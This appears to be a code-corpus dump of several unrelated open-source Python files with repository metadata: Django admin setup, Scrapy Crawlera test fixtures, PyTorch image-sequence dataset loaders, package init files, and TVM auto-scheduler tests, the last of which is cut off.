| ab629c7b9e58a241624c76517585ec0fb9868aab
| 181
| py
| Python
| blog/admin.py
| initsysctrl/mysite
| 881039f3c445e9bbc5615f9510959ca6bb2b7c18
| ["MIT"] | null | null | null
| blog/admin.py
| initsysctrl/mysite
| 881039f3c445e9bbc5615f9510959ca6bb2b7c18
| ["MIT"] | null | null | null
| blog/admin.py
| initsysctrl/mysite
| 881039f3c445e9bbc5615f9510959ca6bb2b7c18
| ["MIT"] | null | null | null |
'''
Date: 2021-03-30 19:32:22
'''
# Register your models here.
from django.contrib import admin
from .models import Blog
admin.site.register(Blog)
| 18.1
| 32
| 0.756906
| 29
| 181
| 4.724138
| 0.62069
| 0.145985
| 0.248175
| 0.335766
| 0.437956
| 0.437956
| 0
| 0
| 0
| 0
| 0
| 0.089172
| 0.132597
| 181
| 9
| 33
| 20.111111
| 0.783439
| 0.292818
| 0
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.75
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| 7
| db495fdcbe4cb231ca26dae296e9cb768de89e50
| 10,619
| py
| Python
| tests/data/responses.py
| ionut-ciubotariu/scrapy-crawlera-fetch
| da74f91d87ac302c09a1965a8c9a6053adf9e60f
| ["BSD-3-Clause"] | null | null | null
| tests/data/responses.py
| ionut-ciubotariu/scrapy-crawlera-fetch
| da74f91d87ac302c09a1965a8c9a6053adf9e60f
| ["BSD-3-Clause"] | null | null | null
| tests/data/responses.py
| ionut-ciubotariu/scrapy-crawlera-fetch
| da74f91d87ac302c09a1965a8c9a6053adf9e60f
| ["BSD-3-Clause"] | null | null | null |
from scrapy.http.request import Request
from scrapy.http.response.html import HtmlResponse
from scrapy.http.response.text import TextResponse
from tests.data import SETTINGS
from tests.utils import mocked_time
test_responses = []
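# Each entry pairs the raw response returned by the Crawlera Fetch endpoint
# ("original") with the decoded response the middleware is expected to
# reconstruct from it ("expected").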
test_responses.append(
{
"original": HtmlResponse(
url=SETTINGS["CRAWLERA_FETCH_URL"],
status=200,
headers={
"Content-Type": "application/json",
"Content-Encoding": "gzip",
"Transfer-Encoding": "chunked",
"Date": "Fri, 24 Apr 2020 18:06:42 GMT",
"Proxy-Connection": "close",
"Connection": "close",
},
request=Request(
SETTINGS["CRAWLERA_FETCH_URL"],
meta={
"crawlera_fetch": {
"timing": {"start_ts": mocked_time()},
"original_request": {"url": "https://fake.host.com"},
}
},
),
body=b"""{"url":"https://fake.host.com","original_status":123,"headers":{"fake-header":"true"},"body":"foobar"}""", # noqa: E501
),
"expected": TextResponse(
url="https://fake.host.com",
status=123,
headers={"Fake-Header": "true"},
body=b"""foobar""", # noqa: E501
),
}
)
test_responses.append(
{
"original": HtmlResponse(
url=SETTINGS["CRAWLERA_FETCH_URL"],
status=200,
headers={
"Content-Type": "application/json",
"Content-Encoding": "gzip",
"Transfer-Encoding": "chunked",
"Date": "Fri, 24 Apr 2020 18:06:42 GMT",
"Proxy-Connection": "close",
"Connection": "close",
},
request=Request(
SETTINGS["CRAWLERA_FETCH_URL"],
meta={
"crawlera_fetch": {
"timing": {"start_ts": mocked_time()},
"original_request": {"url": "https://httpbin.org/get"},
}
},
),
body=b"""{"url":"https://httpbin.org/get","original_status":200,"headers":{"X-Crawlera-Slave":"196.16.27.20:8800","X-Crawlera-Version":"1.43.0-","status":"200","date":"Fri, 24 Apr 2020 18:06:42 GMT","content-type":"application/json","content-length":"756","server":"gunicorn/19.9.0","access-control-allow-origin":"*","access-control-allow-credentials":"true"},"crawlera_status":"success","body_encoding":"plain","body":"<html><head></head><body><pre style=\\"word-wrap: break-word; white-space: pre-wrap;\\">{\\n \\"args\\": {}, \\n \\"headers\\": {\\n \\"Accept\\": \\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\\", \\n \\"Accept-Encoding\\": \\"gzip, deflate, br\\", \\n \\"Accept-Language\\": \\"en-US,en;q=0.9\\", \\n \\"Cache-Control\\": \\"no-cache\\", \\n \\"Host\\": \\"httpbin.org\\", \\n \\"Pragma\\": \\"no-cache\\", \\n \\"Sec-Fetch-Mode\\": \\"navigate\\", \\n \\"Sec-Fetch-Site\\": \\"none\\", \\n \\"Sec-Fetch-User\\": \\"?1\\", \\n \\"Upgrade-Insecure-Requests\\": \\"1\\", \\n \\"User-Agent\\": \\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.44 Safari/537.36\\", \\n \\"X-Amzn-Trace-Id\\": \\"Root=1-5ea32ab2-93f521ee8238c744c88e3fec\\"\\n }, \\n \\"origin\\": \\"173.0.152.100\\", \\n \\"url\\": \\"https://httpbin.org/get\\"\\n}\\n</pre></body></html>"}""", # noqa: E501
),
"expected": HtmlResponse(
url="https://httpbin.org/get",
status=200,
headers={
"X-Crawlera-Slave": "196.16.27.20:8800",
"X-Crawlera-Version": "1.43.0-",
"status": "200",
"date": "Fri, 24 Apr 2020 18:06:42 GMT",
"content-type": "application/json",
"content-length": "756",
"server": "gunicorn/19.9.0",
"access-control-allow-origin": "*",
"access-control-allow-credentials": "true",
},
body=b"""<html><head></head><body><pre style="word-wrap: break-word; white-space: pre-wrap;">{\n "args": {}, \n "headers": {\n "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", \n "Accept-Encoding": "gzip, deflate, br", \n "Accept-Language": "en-US,en;q=0.9", \n "Cache-Control": "no-cache", \n "Host": "httpbin.org", \n "Pragma": "no-cache", \n "Sec-Fetch-Mode": "navigate", \n "Sec-Fetch-Site": "none", \n "Sec-Fetch-User": "?1", \n "Upgrade-Insecure-Requests": "1", \n "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.44 Safari/537.36", \n "X-Amzn-Trace-Id": "Root=1-5ea32ab2-93f521ee8238c744c88e3fec"\n }, \n "origin": "173.0.152.100", \n "url": "https://httpbin.org/get"\n}\n</pre></body></html>""", # noqa: E501
),
}
)
test_responses.append(
{
"original": HtmlResponse(
url=SETTINGS["CRAWLERA_FETCH_URL"],
status=200,
headers={
"Content-Type": "application/json",
"Content-Encoding": "gzip",
"Transfer-Encoding": "chunked",
"Date": "Fri, 24 Apr 2020 18:22:10 GMT",
"Proxy-Connection": "close",
"Connection": "close",
},
request=Request(
SETTINGS["CRAWLERA_FETCH_URL"],
meta={
"crawlera_fetch": {
"timing": {"start_ts": mocked_time()},
"original_request": {"url": "https://example.org"},
}
},
),
body=b"""{"url":"https://example.org","original_status":200,"headers":{"X-Crawlera-Slave":"192.241.80.236:3128","X-Crawlera-Version":"1.43.0-","status":"200","content-encoding":"gzip","accept-ranges":"bytes","age":"108944","cache-control":"max-age=604800","content-type":"text/html; charset=UTF-8","date":"Fri, 24 Apr 2020 18:22:10 GMT","etag":"\\"3147526947\\"","expires":"Fri, 01 May 2020 18:22:10 GMT","last-modified":"Thu, 17 Oct 2019 07:18:26 GMT","server":"ECS (dab/4B85)","vary":"Accept-Encoding","content-length":"648"},"crawlera_status":"success","body_encoding":"plain","body":"<!DOCTYPE html><html><head>\\n <title>Example Domain</title>\\n\\n <meta charset=\\"utf-8\\">\\n <meta http-equiv=\\"Content-type\\" content=\\"text/html; charset=utf-8\\">\\n <meta name=\\"viewport\\" content=\\"width=device-width, initial-scale=1\\">\\n <style type=\\"text/css\\">\\n body {\\n background-color: #f0f0f2;\\n margin: 0;\\n padding: 0;\\n font-family: -apple-system, system-ui, BlinkMacSystemFont, \\"Segoe UI\\", \\"Open Sans\\", \\"Helvetica Neue\\", Helvetica, Arial, sans-serif;\\n \\n }\\n div {\\n width: 600px;\\n margin: 5em auto;\\n padding: 2em;\\n background-color: #fdfdff;\\n border-radius: 0.5em;\\n box-shadow: 2px 3px 7px 2px rgba(0,0,0,0.02);\\n }\\n a:link, a:visited {\\n color: #38488f;\\n text-decoration: none;\\n }\\n @media (max-width: 700px) {\\n div {\\n margin: 0 auto;\\n width: auto;\\n }\\n }\\n </style> \\n</head>\\n\\n<body>\\n<div>\\n <h1>Example Domain</h1>\\n <p>This domain is for use in illustrative examples in documents. You may use this\\n domain in literature without prior coordination or asking for permission.</p>\\n <p><a href=\\"https://www.iana.org/domains/example\\">More information...</a></p>\\n</div>\\n\\n\\n</body></html>"}""", # noqa: E501
),
"expected": HtmlResponse(
url="https://example.org",
status=200,
headers={
"X-Crawlera-Slave": "192.241.80.236:3128",
"X-Crawlera-Version": "1.43.0-",
"status": "200",
"content-encoding": "gzip",
"accept-ranges": "bytes",
"age": "108944",
"cache-control": "max-age=604800",
"content-type": "text/html; charset=UTF-8",
"date": "Fri, 24 Apr 2020 18:22:10 GMT",
"etag": '"3147526947"',
"expires": "Fri, 01 May 2020 18:22:10 GMT",
"last-modified": "Thu, 17 Oct 2019 07:18:26 GMT",
"server": "ECS (dab/4B85)",
"vary": "Accept-Encoding",
"content-length": "648",
},
body=b"""<!DOCTYPE html><html><head>\n <title>Example Domain</title>\n\n <meta charset="utf-8">\n <meta http-equiv="Content-type" content="text/html; charset=utf-8">\n <meta name="viewport" content="width=device-width, initial-scale=1">\n <style type="text/css">\n body {\n background-color: #f0f0f2;\n margin: 0;\n padding: 0;\n font-family: -apple-system, system-ui, BlinkMacSystemFont, "Segoe UI", "Open Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;\n \n }\n div {\n width: 600px;\n margin: 5em auto;\n padding: 2em;\n background-color: #fdfdff;\n border-radius: 0.5em;\n box-shadow: 2px 3px 7px 2px rgba(0,0,0,0.02);\n }\n a:link, a:visited {\n color: #38488f;\n text-decoration: none;\n }\n @media (max-width: 700px) {\n div {\n margin: 0 auto;\n width: auto;\n }\n }\n </style> \n</head>\n\n<body>\n<div>\n <h1>Example Domain</h1>\n <p>This domain is for use in illustrative examples in documents. You may use this\n domain in literature without prior coordination or asking for permission.</p>\n <p><a href="https://www.iana.org/domains/example">More information...</a></p>\n</div>\n\n\n</body></html>""", # noqa: E501
),
}
)
non_processed = HtmlResponse(
url="https://example.org",
status=200,
headers={
"Content-Type": "text/html",
"Content-Encoding": "gzip",
"Transfer-Encoding": "chunked",
"Date": "Fri, 24 Apr 2020 18:06:42 GMT",
},
request=Request("https://example.org"),
body=b"""<html></html>""",
)
test_responses.append({"original": non_processed, "expected": non_processed})
| 71.268456
| 1,996
| 0.526227
| 1,293
| 10,619
| 4.290797
| 0.205723
| 0.008652
| 0.023071
| 0.017304
| 0.931507
| 0.905912
| 0.905912
| 0.875631
| 0.855443
| 0.854722
| 0
| 0.070835
| 0.26349
| 10,619
| 148
| 1,997
| 71.75
| 0.638537
| 0.006121
| 0
| 0.517731
| 0
| 0.035461
| 0.691097
| 0.142315
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.035461
| 0
| 0.035461
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
db64f40e7815cd43b02589b0b2cb546aff16f817
| 80
|
py
|
Python
|
spartan/model/flowscope/__init__.py
|
xyyphant0m/spartan2
|
6c40247052cdce80c2787c9ee0c5485e218c082d
|
[
"BSD-3-Clause"
] | 50
|
2020-08-24T15:21:37.000Z
|
2022-03-09T09:18:17.000Z
|
spartan/model/flowscope/__init__.py
|
xyyphant0m/spartan2
|
6c40247052cdce80c2787c9ee0c5485e218c082d
|
[
"BSD-3-Clause"
] | 16
|
2020-08-24T15:20:46.000Z
|
2021-12-20T03:13:40.000Z
|
spartan/model/flowscope/__init__.py
|
xyyphant0m/spartan2
|
6c40247052cdce80c2787c9ee0c5485e218c082d
|
[
"BSD-3-Clause"
] | 15
|
2020-08-24T15:13:16.000Z
|
2022-02-26T15:25:05.000Z
|
from .flowscopeFraudDect import FlowScope
def __call__():
return FlowScope
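# Usage sketch (assumption: callers resolve this hook via attribute lookup,
# since calling a module object does not invoke a module-level __call__):
#
#     from spartan.model import flowscope
#     model_cls = flowscope.__call__()  # returns the FlowScope class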
| 16
| 41
| 0.7875
| 8
| 80
| 7.375
| 0.875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.1625
| 80
| 4
| 42
| 20
| 0.880597
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
dba24b58ba244335f4a480bc55a2c759713de21c
| 9,435
|
py
|
Python
|
utils/dataset.py
|
THU-CVlab/MEPDNet-pytorch
|
af033785fe183a4360f3f395087b45aba377d2bc
|
[
"MIT"
] | 2
|
2021-06-13T05:58:52.000Z
|
2021-07-09T03:44:13.000Z
|
utils/dataset.py
|
THU-CVlab/MEPDNet-pytorch
|
af033785fe183a4360f3f395087b45aba377d2bc
|
[
"MIT"
] | null | null | null |
utils/dataset.py
|
THU-CVlab/MEPDNet-pytorch
|
af033785fe183a4360f3f395087b45aba377d2bc
|
[
"MIT"
] | null | null | null |
import os
import glob
import torch
import numpy as np
from PIL import Image
from os import listdir
from os.path import join, split, splitext
from utils import is_image_file
from torch.utils.data import Dataset
class SingleDataset(Dataset):
def __init__(self, img_dir, mask_dir, input_transform, target_transform, logger=None):
self.img_dir = np.load(img_dir)
self.mask_dir = mask_dir
self.img_file_names = [join('data/imgs', file_name) for file_name in self.img_dir if is_image_file(file_name)]
self.mask_file_names = [join(mask_dir, file_name.replace('\\', '/').split('/')[-1].replace('.jpg', '.npy')) for file_name in self.img_dir if is_image_file(file_name)]
if logger is not None:
logger.info(f'Finished creating an instance of {self.__class__.__name__} with {len(self.img_file_names)} examples')
else:
print(f'Finished creating an instance of {self.__class__.__name__} with {len(self.img_file_names)} examples')
self.input_transform = input_transform
self.target_transform = target_transform
def __len__(self):
return len(self.img_file_names)
def __getitem__(self,i):
img = np.array(Image.open(self.img_file_names[i]))
mask = np.load(self.mask_file_names[i])
pad = lambda img: np.stack([img,img,img],axis=2) if (len(img.shape)==2 or img.shape[2]==1) else img
img = pad(img)
img = self.input_transform(img)
mask = self.target_transform(mask)
return img, mask
class SeqDataset(Dataset):
def __init__(self, img_dir, mask_dir, input_transform, target_transform, logger=None):
self.img_dir = np.load(img_dir)
self.mask_dir = mask_dir
self.img_file_names = [join('data/imgs', file_name) for file_name in self.img_dir if is_image_file(file_name)]
self.mask_file_names = [join(mask_dir, file_name.replace('\\', '/').split('/')[-1].replace('.jpg', '.npy')) for file_name in self.img_dir if is_image_file(file_name)]
if logger is not None:
logger.info(f'Finished creating an instance of {self.__class__.__name__} with {len(self.img_file_names)} examples')
else:
print(f'Finished creating an instance of {self.__class__.__name__} with {len(self.img_file_names)} examples')
self.input_transform = input_transform
self.target_transform = target_transform
def __len__(self):
return len(self.img_file_names)
def __getitem__(self, i):
if i % 30 == 0:
imgu1 = np.array(Image.open(self.img_file_names[i]))
else:
imgu1 = np.array(Image.open(self.img_file_names[i - 1]))
img = np.array(Image.open(self.img_file_names[i]))
if i % 30 == 29:
imgd1 = np.array(Image.open(self.img_file_names[i]))
else:
imgd1 = np.array(Image.open(self.img_file_names[i + 1]))
mask = np.load(self.mask_file_names[i])
pad = lambda img: np.stack([img,img,img],axis=2) if (len(img.shape)==2 or img.shape[2]==1) else img
imgu1, img, imgd1 = pad(imgu1), pad(img), pad(imgd1)
imgu1, img, imgd1 = self.input_transform(imgu1), self.input_transform(img), self.input_transform(imgd1)
mask = self.target_transform(mask)
return imgu1, img, imgd1, mask
class SingleTestDataset(Dataset):
def __init__(self, img_dir, mask_dir, input_transform, target_transform, logger=None):
self.img_dir = np.load(img_dir)
self.mask_dir = mask_dir
self.img_file_names = [join('data/imgs', file_name) for file_name in self.img_dir if is_image_file(file_name)]
self.mask_file_names = [join(mask_dir, file_name.replace('\\', '/').split('/')[-1].replace('.jpg', '.npy')) for file_name in self.img_dir if is_image_file(file_name)]
if logger is not None:
logger.info(f'Finished creating an instance of {self.__class__.__name__} with {len(self.img_file_names)} examples')
else:
print(f'Finished creating an instance of {self.__class__.__name__} with {len(self.img_file_names)} examples')
self.input_transform = input_transform
self.target_transform = target_transform
def __len__(self):
return len(self.img_file_names)
def __getitem__(self,i):
img = np.array(Image.open(self.img_file_names[i]))
mask = np.load(self.mask_file_names[i])
pad = lambda img: np.stack([img,img,img],axis=2) if (len(img.shape)==2 or img.shape[2]==1) else img
img = pad(img)
img = self.input_transform(img)
mask = self.target_transform(mask)
return img, mask, self.img_file_names[i]
class SeqTestDataset(Dataset):
def __init__(self, img_dir, mask_dir, input_transform, target_transform, logger=None):
self.img_dir = np.load(img_dir)
self.mask_dir = mask_dir
self.img_file_names = [join('data/imgs', file_name) for file_name in self.img_dir if is_image_file(file_name)]
self.mask_file_names = [join(mask_dir, file_name.replace('\\', '/').split('/')[-1].replace('.jpg', '.npy')) for file_name in self.img_dir if is_image_file(file_name)]
if logger is not None:
logger.info(f'Finished creating an instance of {self.__class__.__name__} with {len(self.img_file_names)} examples')
else:
print(f'Finished creating an instance of {self.__class__.__name__} with {len(self.img_file_names)} examples')
self.input_transform = input_transform
self.target_transform = target_transform
def __len__(self):
return len(self.img_file_names)
def __getitem__(self,i):
if i % 30 == 0:
imgu1 = np.array(Image.open(self.img_file_names[i]))
else:
imgu1 = np.array(Image.open(self.img_file_names[i - 1]))
img = np.array(Image.open(self.img_file_names[i]))
if i % 30 == 29:
imgd1 = np.array(Image.open(self.img_file_names[i]))
else:
imgd1 = np.array(Image.open(self.img_file_names[i + 1]))
mask = np.load(self.mask_file_names[i])
pad = lambda img: np.stack([img,img,img],axis=2) if (len(img.shape)==2 or img.shape[2]==1) else img
imgu1, img, imgd1 = pad(imgu1), pad(img), pad(imgd1)
imgu1, img, imgd1 = self.input_transform(imgu1), self.input_transform(img), self.input_transform(imgd1)
mask = self.target_transform(mask)
return imgu1, img, imgd1, mask, self.img_file_names[i]
class SingleUseDataset(Dataset):
def __init__(self, img_dir, input_transform, logger=None):
self.img_dir = np.load(img_dir)
self.img_file_names = [join('data/imgs', file_name) for file_name in self.img_dir if is_image_file(file_name)]
if logger is not None:
logger.info(f'Finished creating an instance of {self.__class__.__name__} with {len(self.img_file_names)} examples')
else:
print(f'Finished creating an instance of {self.__class__.__name__} with {len(self.img_file_names)} examples')
self.input_transform = input_transform
def __len__(self):
return len(self.img_file_names)
def __getitem__(self,i):
img = np.array(Image.open(self.img_file_names[i]))
pad = lambda img: np.stack([img,img,img],axis=2) if (len(img.shape)==2 or img.shape[2]==1) else img
img = pad(img)
img = self.input_transform(img)
return img, self.img_file_names[i]
class SeqUseDataset(Dataset):
def __init__(self, img_dir, input_transform, logger=None):
self.img_dir = np.load(img_dir)
self.img_file_names = [join('data/imgs', file_name) for file_name in self.img_dir if is_image_file(file_name)]
if logger is not None:
logger.info(f'Finished creating an instance of {self.__class__.__name__} with {len(self.img_file_names)} examples')
else:
print(f'Finished creating an instance of {self.__class__.__name__} with {len(self.img_file_names)} examples')
self.input_transform = input_transform
def __len__(self):
return len(self.img_file_names)
def __getitem__(self,i):
if i % 30 == 0:
imgu1 = np.array(Image.open(self.img_file_names[i]))
else:
imgu1 = np.array(Image.open(self.img_file_names[i - 1]))
img = np.array(Image.open(self.img_file_names[i]))
if i % 30 == 29:
imgd1 = np.array(Image.open(self.img_file_names[i]))
else:
imgd1 = np.array(Image.open(self.img_file_names[i + 1]))
pad = lambda img: np.stack([img,img,img],axis=2) if (len(img.shape)==2 or img.shape[2]==1) else img
imgu1, img, imgd1 = pad(imgu1), pad(img), pad(imgd1)
imgu1, img, imgd1 = self.input_transform(imgu1), self.input_transform(img), self.input_transform(imgd1)
return imgu1, img, imgd1, self.img_file_names[i]
if __name__ == "__main__":
from transform import ToLabel
from torchvision.transforms import Compose, CenterCrop, Normalize
from torchvision.transforms import ToTensor, ToPILImage
input_transform = Compose([
ToTensor(),
])
target_transform = Compose([
ToLabel(),
])
dataset = SeqDataset('data/train.npy', 'data/masks', input_transform, target_transform)
imgu1, img, imgd1, mask = dataset.__getitem__(0)
print(imgu1.shape)
print(img.shape)
print(imgd1.shape)
print(mask.shape)
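# Continuing the __main__ demo above: a minimal sketch wrapping SeqDataset in
# a standard torch DataLoader (batch order follows __getitem__'s return tuple):
#
#     from torch.utils.data import DataLoader
#     loader = DataLoader(dataset, batch_size=4, shuffle=True, num_workers=2)
#     imgu1, img, imgd1, mask = next(iter(loader))  # one batch of frame triplets + masks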
| 45.143541
| 174
| 0.662109
| 1,401
| 9,435
| 4.149179
| 0.06424
| 0.081885
| 0.087046
| 0.126613
| 0.88801
| 0.88801
| 0.880956
| 0.873387
| 0.873387
| 0.873387
| 0
| 0.013732
| 0.212719
| 9,435
| 208
| 175
| 45.360577
| 0.768848
| 0
| 0
| 0.795322
| 0
| 0.070175
| 0.140117
| 0.064865
| 0
| 0
| 0
| 0
| 0
| 1
| 0.105263
| false
| 0
| 0.070175
| 0.035088
| 0.280702
| 0.05848
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
dbba89e2dcb3ecab8c0ca99ffdcb8ebcb7da260d
| 106
|
py
|
Python
|
icevision/models/mmdet/fastai/__init__.py
|
ai-fast-track/mantisshrimp
|
cc6d6a4a048f6ddda2782b6593dcd6b083a673e4
|
[
"Apache-2.0"
] | 580
|
2020-09-10T06:29:57.000Z
|
2022-03-29T19:34:54.000Z
|
icevision/models/mmdet/fastai/__init__.py
|
ai-fast-track/mantisshrimp
|
cc6d6a4a048f6ddda2782b6593dcd6b083a673e4
|
[
"Apache-2.0"
] | 691
|
2020-09-05T03:08:34.000Z
|
2022-03-31T23:47:06.000Z
|
icevision/models/mmdet/fastai/__init__.py
|
lgvaz/mantisshrimp2
|
743cb7df0dae7eb1331fc2bb66fc9ca09db496cd
|
[
"Apache-2.0"
] | 105
|
2020-09-09T10:41:35.000Z
|
2022-03-25T17:16:49.000Z
|
from icevision.models.mmdet.fastai.callbacks import *
from icevision.models.mmdet.fastai.learner import *
| 35.333333
| 53
| 0.830189
| 14
| 106
| 6.285714
| 0.571429
| 0.295455
| 0.431818
| 0.545455
| 0.681818
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.075472
| 106
| 2
| 54
| 53
| 0.897959
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
9197a2097ebc25dbcdcf4f16fc61c7176f468aeb
| 8,788
|
py
|
Python
|
tests/python/unittest/test_auto_scheduler_search_task.py
|
XiaoSong9905/tvm
|
48940f697e15d5b50fa1f032003e6c700ae1e423
|
[
"Apache-2.0"
] | 4,640
|
2017-08-17T19:22:15.000Z
|
2019-11-04T15:29:46.000Z
|
tests/python/unittest/test_auto_scheduler_search_task.py
|
XiaoSong9905/tvm
|
48940f697e15d5b50fa1f032003e6c700ae1e423
|
[
"Apache-2.0"
] | 3,022
|
2020-11-24T14:02:31.000Z
|
2022-03-31T23:55:31.000Z
|
tests/python/unittest/test_auto_scheduler_search_task.py
|
XiaoSong9905/tvm
|
48940f697e15d5b50fa1f032003e6c700ae1e423
|
[
"Apache-2.0"
] | 1,352
|
2017-08-17T19:30:38.000Z
|
2019-11-04T16:09:29.000Z
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Test search policy"""
import numpy as np
import tempfile
import tvm
import tvm.testing
from tvm import auto_scheduler
from tvm.auto_scheduler.utils import get_const_tuple
from tvm.testing.auto_scheduler import (
matmul_auto_scheduler_test,
zero_rank_compute_auto_scheduler_test,
zero_rank_reduce_auto_scheduler_test,
)
def test_search_task_add_task_input():
auto_scheduler.search_task.TASK_INPUT_BUFFER_TABLE.clear()
N = 64
target = "llvm"
test_input_0 = tvm.runtime.ndarray.empty((64, 64))
test_input_1 = tvm.runtime.ndarray.empty((10, 20))
test_input_2 = tvm.runtime.ndarray.empty((30, 40, 50))
task = auto_scheduler.SearchTask(
func="matmul_auto_scheduler_test",
args=(N, N, N),
target=target,
task_inputs={
"test_input_0": test_input_0,
"test_input_1": test_input_1,
"test_input_2": test_input_2,
},
task_inputs_overwrite=True,
)
assert len(task.task_input_names) == 3
assert task.task_input_names[0] == "test_input_0"
assert task.task_input_names[1] == "test_input_1"
assert task.task_input_names[2] == "test_input_2"
def test_search_task_record():
auto_scheduler.search_task.TASK_INPUT_BUFFER_TABLE.clear()
N = 64
target = "llvm"
# Log with no task input
task = auto_scheduler.SearchTask(
func="matmul_auto_scheduler_test", args=(N, N, N), target=target
)
task_record = auto_scheduler._ffi_api.SerializeSearchTask(task)
new_task = auto_scheduler._ffi_api.DeserializeSearchTask(task_record)
# TODO(jcf94): Check the compute dag & hardware parameter
assert task.workload_key == new_task.workload_key
assert str(task.target) == str(new_task.target)
assert str(task.target.host) == str(new_task.target.host)
assert task.layout_rewrite_option == new_task.layout_rewrite_option
# Log with 1 task input
test_input_0 = tvm.runtime.ndarray.empty((64, 64))
task = auto_scheduler.SearchTask(
func="matmul_auto_scheduler_test",
args=(N, N, N),
target=target,
task_inputs={"test_input_0": test_input_0},
task_inputs_overwrite=True,
)
task_record = auto_scheduler._ffi_api.SerializeSearchTask(task)
new_task = auto_scheduler._ffi_api.DeserializeSearchTask(task_record)
assert task.workload_key == new_task.workload_key
assert str(task.target) == str(new_task.target)
assert str(task.target.host) == str(new_task.target.host)
assert task.layout_rewrite_option == new_task.layout_rewrite_option
assert len(new_task.task_input_names) == 1
assert new_task.task_input_names[0] == "test_input_0"
# Log with multiple task inputs
test_input_1 = tvm.runtime.ndarray.empty((64, 64))
task = auto_scheduler.SearchTask(
func="matmul_auto_scheduler_test",
args=(N, N, N),
target=target,
task_inputs={
"test_input_0": test_input_0,
"test_input_1": test_input_1,
},
task_inputs_overwrite=True,
)
task_record = auto_scheduler._ffi_api.SerializeSearchTask(task)
new_task = auto_scheduler._ffi_api.DeserializeSearchTask(task_record)
assert task.workload_key == new_task.workload_key
assert str(task.target) == str(new_task.target)
assert str(task.target.host) == str(new_task.target.host)
assert task.layout_rewrite_option == new_task.layout_rewrite_option
assert len(new_task.task_input_names) == 2
assert new_task.task_input_names[0] == "test_input_0"
assert new_task.task_input_names[1] == "test_input_1"
# Log with version 0.5
v5_log = """["[\\\"matmul_auto_scheduler_test\\\", 64, 64, 64]", "llvm -keys=cpu", [6, 64, 64, 0, 0, 0, 0, 0], "", 1]"""
new_task = auto_scheduler._ffi_api.DeserializeSearchTask(v5_log)
assert task.workload_key == new_task.workload_key
assert str(task.target) == str(new_task.target)
assert str(task.target.host) == str(new_task.target.host)
assert task.layout_rewrite_option == new_task.layout_rewrite_option
assert len(new_task.task_input_names) == 0
def test_recover_measure_input_with_task_input():
auto_scheduler.search_task.TASK_INPUT_BUFFER_TABLE.clear()
# Since this file contains the tests for search_task, we only check the search_task here
# Log with no task input
task = auto_scheduler.SearchTask(
func=matmul_auto_scheduler_test, args=(512, 512, 512), target="llvm"
)
inp = auto_scheduler.measure.MeasureInput(task, task.compute_dag.init_state)
res = auto_scheduler.measure.MeasureResult([0.1], 0, "", 0.2, 1)
measure_record = auto_scheduler.measure_record.dump_record_to_string(inp, res)
measure_log = auto_scheduler.measure_record.load_record_from_string(measure_record)
new_task = measure_log[0].task
assert task.workload_key == new_task.workload_key
assert str(task.target) == str(new_task.target)
assert str(task.target.host) == str(new_task.target.host)
assert task.layout_rewrite_option == new_task.layout_rewrite_option
# Log with 1 task input
test_input_0 = tvm.runtime.ndarray.empty((64, 64))
task = auto_scheduler.SearchTask(
func=matmul_auto_scheduler_test,
args=(512, 512, 512),
target="llvm",
task_inputs={
"test_input_0": test_input_0,
},
